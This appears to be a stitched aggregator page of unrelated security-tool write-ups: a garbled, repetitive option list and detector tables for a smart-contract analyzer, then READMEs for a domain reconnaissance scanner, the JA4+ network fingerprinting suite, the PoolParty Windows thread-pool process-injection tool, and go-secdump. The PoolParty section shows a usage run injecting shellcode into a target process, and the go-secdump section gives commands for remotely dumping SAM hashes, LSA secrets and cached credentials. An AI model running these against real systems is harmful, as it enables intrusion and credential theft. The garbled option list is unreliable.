[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

  • Vulnerability detection options: --detect, --exclude-detectors
  • Reporting options: --report-format, --report-output, --report-*
  • Filtering options: --filter-*
  • AI integration options: --ai-*
  • Integration with development frameworks: --truffle, --truffle-build-directory
  • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

AI-Powered Detectors

Num Detector What it Detects Impact Confidence
1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
## Detectors
Num Detector What it Detects Impact Confidence
1 abiencoderv2-array Storage abiencoderv2 array High High
2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
3 array-by-reference Modifying storage array by value High High
4 encode-packed-collision ABI encodePacked Collision High High
5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
6 multiple-constructors Multiple constructor schemes High High
7 name-reused Contract's name reused High High
8 protected-vars Detected unprotected variables High High
9 public-mappings-nested Public mappings with nested variables High High
10 rtlo Right-To-Left-Override control character is used High High
11 shadowing-state State variables shadowing High High
12 suicidal Functions allowing anyone to destruct the contract High High
13 uninitialized-state Uninitialized state variables High High
14 uninitialized-storage Uninitialized storage variables High High
15 unprotected-upgrade Unprotected upgradeable contract High High
16 codex Use Codex to find vulnerabilities. High Low
17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
19 controlled-array-length Tainted array length assignment High Medium
20 controlled-delegatecall Controlled delegatecall destination High Medium
21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
22 incorrect-exp Incorrect exponentiation High Medium
23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
24 msg-value-loop msg.value inside a loop High Medium
25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
26 return-leave If a return is used instead of a leave. High Medium
27 storage-array Signed storage integer array compiler bug High Medium
28 unchecked-transfer Unchecked tokens transfer High Medium
29 weak-prng Weak PRNG High Medium
30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
31 enum-conversion Detect dangerous enum conversion Medium High
32 erc20-interface Incorrect ERC20 interfaces Medium High
33 erc721-interface Incorrect ERC721 interfaces Medium High
34 incorrect-equality Dangerous strict equalities Medium High
35 locked-ether Contracts that lock ether Medium High
36 mapping-deletion Deletion on mapping containing a structure Medium High
37 shadowing-abstract State variables shadowing from abstract contracts Medium High
38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
39 tautology Tautology or contradiction Medium High
40 write-after-write Unused write Medium High
41 boolean-cst Misuse of Boolean constant Medium Medium
42 constant-function-asm Constant functions using assembly code Medium Medium
43 constant-function-state Constant functions changing the state Medium Medium
44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
47 reused-constructor Reused base constructor Medium Medium
48 tx-origin Dangerous usage of tx.origin Medium Medium
49 unchecked-lowlevel Unchecked low-level calls Medium Medium
50 unchecked-send Unchecked send Medium Medium
51 uninitialized-local Uninitialized local variables Medium Medium
52 unused-return Unused return values Medium Medium
53 incorrect-modifier Modifiers that can return the default value Low High
54 shadowing-builtin Built-in symbol shadowing Low High
55 shadowing-local Local variables shadowing Low High
56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
57 variable-scope Local variables used prior their declaration Low High
58 void-cst Constructor called not implemented Low High
59 calls-loop Multiple calls in a loop Low Medium
60 events-access Missing Events Access Control Low Medium
61 events-maths Missing Events Arithmetic Low Medium
62 incorrect-unary Dangerous unary expressions Low Medium
63 missing-zero-check Missing Zero Address Validation Low Medium
64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
67 timestamp Dangerous usage of block.timestamp Low Medium
68 assembly Assembly usage Informational High
69 assert-state-change Assert state change Informational High
70 boolean-equal Comparison to boolean constant Informational High
71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
72 deprecated-standards Deprecated Solidity Standards Informational High
73 erc20-indexed Un-indexed ERC20 event parameters Informational High
74 function-init-state Function initializing state variables Informational High
75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
76 low-level-calls Low level calls Informational High
77 missing-inheritance Missing inheritance Informational High
78 naming-convention Conformity to Solidity naming conventions Informational High
79 pragma If different pragma directives are used Informational High
80 redundant-statements Redundant statements Informational High
81 solc-version Incorrect Solidity version Informational High
82 unimplemented-functions Unimplemented functions Informational High
83 unused-import Detects unused imports Informational High
84 unused-state Unused state variables Informational High
85 costly-loop Costly operations in a loop Informational Medium
86 dead-code Functions that are not used Informational Medium
87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
88 similar-names Variable names are too similar Informational Medium
89 too-many-digits Conformance to numeric notation best practices Informational Medium
90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
91 constable-states State variables that could be declared constant Optimization High
92 external-function Public function that could be declared external Optimization High
93 immutable-states State variables that could be declared immutable Optimization High
94 var-read-using-this Contract reads its own variable using this Optimization High


Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

By: Zion3R


Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


Features

Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

A fast and comprehensive tool for organizational network scanning (6)

A fast and comprehensive tool for organizational network scanning (7)

  • Virtual hostname enumeration
  • Reverse DNS lookup

A fast and comprehensive tool for organizational network scanning (8)

  • Detects wildcard subdomains (for bruteforcing)

A fast and comprehensive tool for organizational network scanning (9)

  • Basic TCP port scanning
  • Subdomains are accepted as input

A fast and comprehensive tool for organizational network scanning (10)

  • Export results to JSON file

A fast and comprehensive tool for organizational network scanning (11)

A few features are work in progress. See Planned features for more details.

The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

Installation

You can build this repo from source- - Clone the repository

git clone git@github.com:pptx704/domainim
  • Build the binary
nimble build
  • Run the binary
./domainim <domain> [--ports=<ports>]

Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

Usage

./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
  • <domain> is the domain to be enumerated. It can be a subdomain as well.
  • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
  • all - Scan all ports (1-65535)
  • none - Skip port scanning (default)
  • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
  • single value - Scan a single port. i.e. 80 scans port 80
  • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
  • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
  • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
  • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
  • a.b.c.d - Use DNS server at a.b.c.d on port 53
  • a.b.c.d#n - Use DNS server at a.b.c.d on port e
  • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
  • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
  • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

The help menu can be accessed using ./domainim --help or ./domainim -h.

Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)

Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`

Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json

The JSON schema for the results is as follows-

[
{
"subdomain": string,
"data": [
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]
]
}
]

Example json for nmap.org can be found here.

Contributing

Contributions are welcome. Feel free to open a pull request or an issue.

Planned Features

  • [x] TCP port scanning
  • [ ] UDP port scanning support
  • [ ] Resolve AAAA records (IPv6)
  • [x] Custom DNS server
  • [x] Add bruteforcing subdomains using a wordlist
  • [ ] Force bruteforcing (even if wildcard subdomain is found)
  • [ ] Add more engines for subdomain enumeration
  • [x] File output (JSON)
  • [ ] Multiple domain enumeration
  • [ ] Dir and File busting

Others

  • [x] Update verbose output when encountering errors (v0.2.0)
  • [x] Show progress bar for longer operations
  • [ ] Add individual port scan progress bar
  • [ ] Add tests
  • [ ] Add comments and docstrings

Additional Notes

This project is still in its early stages. There are several limitations I am aware of.

The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

It might seem that the way vhostnames are printed, it just brings repeition on the table.

A fast and comprehensive tool for organizational network scanning (12)

Printing as the following might've been better-

ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
โ†ณ 45.33.49.119
โ†ณ Reverse DNS: ack.nmap.org.

But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

A fast and comprehensive tool for organizational network scanning (13)

DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org but something.ack.nmap.org might be. I can search for all subdomains of nmap.org but that defeats the purpose of having a subdomains as an input.

License

MIT License. See LICENSE for full text.



JA4+ - Suite Of Network Fingerprinting Standards

By: Zion3R


JA4+ is a suite of network Fingerprintingย methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)


To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
fastly
with more to be announced...

Examples

Application JA4+ Fingerprints
Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
JA4S=t120300_c030_5e2616a54c73
Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
JA4S=t130200_1301_a56c5b993250
JA4X=000000000000_4f24da86fad6_bf0f0589fc03
JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
JA4X=2166164053c1_2166164053c1_30d204a01551
SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
JA4S=t130200_1302_a56c5b993250
JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
Qakbot JA4X=2bab15409345_af684594efb4_000000000000
Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
Darkgate JA4H=po10nn060000_cdb958d032b0
LummaC2 JA4H=po11nn050000_d253db9d024b
Evilginx JA4=t13d191000_9dc949149365_e7c285222651
Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

Plugins

Wireshark
Zeek
Arkime

Binaries

Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

Download the latest JA4 binaries from: Releases.

JA4+ on Ubuntu

sudo apt install tshark
./ja4 [options] [pcap]

JA4+ on Mac

1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]

JA4+ on Windows

1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate the ja4 folder

ja4 [options] [pcap]

Database

An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

In the meantime, see ja4plus-mapping.csv

Feel free to do a pull request with any JA4+ data you find.

JA4+ Details

JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

Current methods and implementation details:
| Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

To understand how to read JA4+ fingerprints, see Technical Details

Licensing

JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO

JA4+ can and is being implemented into open source tools, see the License FAQ for details.

This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

Q&A

Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

JA4+ was created by:

John Althouse, with feedback from:

Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

Contact John Althouse at john@foxio.io for licensing and questions.

Copyright (c) 2024, FoxIO



PoolParty - A Set Of Fully-Undetectable Process Injection Techniques Abusing Windows Thread Pools

By: Zion3R


A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - injection-techniques-using-windows-thread-pools-35446">The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools


PoolParty Variants

Variant ID Varient Description
1 Overwrite the start routine of the target worker factory
2 Insert TP_WORK work item to the target process's thread pool
3 Insert TP_WAIT work item to the target process's thread pool
4 Insert TP_IO work item to the target process's thread pool
5 Insert TP_ALPC work item to the target process's thread pool
6 Insert TP_JOB work item to the target process's thread pool
7 Insert TP_DIRECT work item to the target process's thread pool
8 Insert TP_TIMER work item to the target process's thread pool

Usage

PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

Usage Examples

Insert TP_TIMER work item to process ID 1234

>> PoolParty.exe -V 8 -P 1234

[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExp iration
[info] PoolParty attack completed successfully

Default Shellcode and Customization

The default shellcode spawns a calculator via the WinExec API.

To customize the executable to execute, change the path in the end of the g_Shellcode variable present in the main.cpp file.

Author - Alon Leviev



Go-Secdump - Tool To Remotely Dump Secrets From The Windows Registry

By: Zion3R


Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.

The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.

It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.

The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.


Credits

Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.

Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

http://www.beginningtoseethelight.org/ntsecurity/index.htm

https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral

Usage

Usage: ./go-secdump [options]

options:
--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only ohter explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version

Changing DACLs

go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.

Using the --backup-dacl argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl argument.

Examples

Dump all registry secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

Dump only SAM, LSA, or DCC2 cache secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
